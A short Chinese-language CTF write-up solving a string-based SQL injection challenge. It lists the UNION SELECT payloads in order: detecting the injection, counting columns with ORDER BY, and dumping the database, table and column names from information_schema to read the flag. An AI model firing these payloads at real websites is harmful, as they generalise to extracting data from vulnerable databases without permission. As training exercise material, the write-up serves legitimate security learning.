1.打开题目在url上判断是数字型注入还是字符型注入
1' //无回显,说明是报错了,‘和后面的‘冲突了
1’ --+ //有回显,是因为--+把后面的‘注释掉了
2.使用命令判断列数
1'order by 1--+ //有回显
1'order by 2 --+ //有回显
1'order by 3--+ //有回显
1'order by 4--+ //无回显
3.使用联合注入进行解题
-1'union select 1,2,3--+ //判断回显的位置
判断出回显的位置是2和3
查看数据库:-1'union select 1,2,database()--+ //获取到数据库名为note
查看表名 -1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='note'--+ //获取到一个叫fl4g的表名
查看列名:-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='fl4g'--+
查看字段:-1’union select 1,2,fllllag from note.fl4g--+ //获取到flag
感谢观看,请点个关注谢谢